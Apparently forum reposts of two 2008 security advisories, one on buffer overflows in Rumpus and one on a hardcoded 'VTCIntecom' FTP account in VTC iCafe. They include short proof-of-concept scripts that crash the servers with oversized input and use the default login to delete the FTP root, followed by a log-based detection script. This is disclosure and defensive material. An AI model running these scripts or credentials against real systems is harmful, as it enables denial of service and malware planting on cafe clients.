Messages posted by "bmrobot"

Two buffer overflow vulnerabilities in Rumpus

http://www.maxum.com/Rumpus/News601.html.
:Public disclosure: December 01, 2008

:Exploit code:

For the vulnerability in HTTP component::

  from socket import socket, AF_INET, SOCK_STREAM

  host = "192.168.1.12"
  port = 80

  s = socket(AF_INET, SOCK_STREAM)
  s.connect((host, port))
  s.send('z' * 2908 + '\n\n')
  s.recv(1024)
  s.close()

For the vulnerability in FTP component::

  from socket import socket, AF_INET, SOCK_STREAM

  host = "192.168.1.12"
  port = 21
  user = "regular"
  pass_ = "training"

  commands = [
      'user regular\n',
      'pass training\n',
      'mkd ' + 'z' * 1046 + 'abcd\n'
  ]

  s = socket(AF_INET, SOCK_STREAM)
  s.connect((host, port))
  s.recv(1024)
  for line in commands:
      s.send(line)
      s.recv(1024)
  s.close()

Disclaimer
----------

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.

Insecure default FTP password in VTC iCafe
BLUE MOON SECURITY ADVISORY 2008-08
===================================


:Title: Insecure default FTP password in VTC iCafe
:Severity: Critical
:Reporter: Blue Moon Consulting
:Products: VTC iCafe 1.17
:Fixed in: --


Description
-----------

VTC iCafe is an internet cafe management application. It uses a hardcoded, insecure default FTP username and password, ``VTCIntecom`` / ``VTCIntecom``. The FTP server listens on port 6655 and distributes update files to the clients. A malicious user could use this knowledge to a) cause a denial of service on the clients by removing the FTP root directory, or b) place malware such as viruses or trojans on the clients by replacing the update files.

Workaround
----------

There is no workaround.

Fix
---

There is no fix at the moment. Customers are advised to contact the vendor for a proper fix.

Disclosure
----------

Blue Moon Consulting adapts `RFPolicy v2.0 <http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors.

:Initial vendor contact:

  August 12, 2008: Initial contact sent to support.icafe@vtc.vn

:Vendor response: --

:Public disclosure: August 20, 2008

:Exploit code:

::

  import ftplib
  
  ftp = ftplib.FTP()
  ftp.connect("localhost", 6655)
  ftp.login("VTCIntecom", "VTCIntecom")
  ftp.sendcmd("RMD \x00")
  ftp.quit()

Disclaimer
----------

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.
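
One way to detect abuse of the hardcoded ``VTCIntecom`` account described in the VTC iCafe advisory above, added here as an example and not part of the original advisory or the vendor's software. It flags FTP sessions that log in with that account and then issue file-modifying commands, or that log in from outside the client subnet. The log layout, the subnet and the sample lines are constructed assumptions.

```python
import ipaddress

# Assumptions (not from the advisory): the log line layout, the client subnet,
# and that legitimate update clients only list and download files.
DEFAULT_USER = "VTCIntecom"      # hardcoded account named in the advisory
CAFE_NET = ipaddress.ip_network("192.168.10.0/24")   # hypothetical client subnet
MODIFYING = {"STOR", "STOU", "APPE", "DELE", "RMD", "MKD", "RNFR", "RNTO"}

# Constructed sample: "<date> <time> <client-ip> <session-id> <command> [argument]"
SAMPLE_LOG = """\
2008-08-20 09:00:01 192.168.10.21 s1 USER VTCIntecom
2008-08-20 09:00:01 192.168.10.21 s1 PASS ****
2008-08-20 09:00:02 192.168.10.21 s1 RETR update.bin
2008-08-20 09:05:10 192.168.10.37 s2 USER VTCIntecom
2008-08-20 09:05:11 192.168.10.37 s2 DELE update.bin
2008-08-20 09:05:12 192.168.10.37 s2 STOR update.bin
2008-08-20 09:07:44 10.9.8.7 s3 USER VTCIntecom
2008-08-20 09:07:45 10.9.8.7 s3 RETR update.bin
2008-08-20 09:09:00 192.168.10.40 s4 USER operator
2008-08-20 09:09:01 192.168.10.40 s4 MKD reports
"""

def find_suspicious_sessions(log_text, allowed_net=CAFE_NET):
    """Return {session_id: [reasons]} for sessions using the default account."""
    default_sessions = set()     # sessions currently logged in as DEFAULT_USER
    findings = {}
    for line in log_text.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 5:
            continue             # skip malformed or truncated lines
        ip, sid, cmd = parts[2], parts[3], parts[4].upper()
        arg = parts[5] if len(parts) > 5 else ""
        if cmd == "USER":
            if arg != DEFAULT_USER:
                default_sessions.discard(sid)   # session switched accounts
                continue
            default_sessions.add(sid)
            if ipaddress.ip_address(ip) not in allowed_net:
                findings.setdefault(sid, []).append(
                    "login from outside client subnet: " + ip)
        elif sid in default_sessions and cmd in MODIFYING:
            findings.setdefault(sid, []).append("modifying command: " + cmd)
    return findings

if __name__ == "__main__":
    for sid, reasons in find_suspicious_sessions(SAMPLE_LOG).items():
        print(sid, reasons)
```
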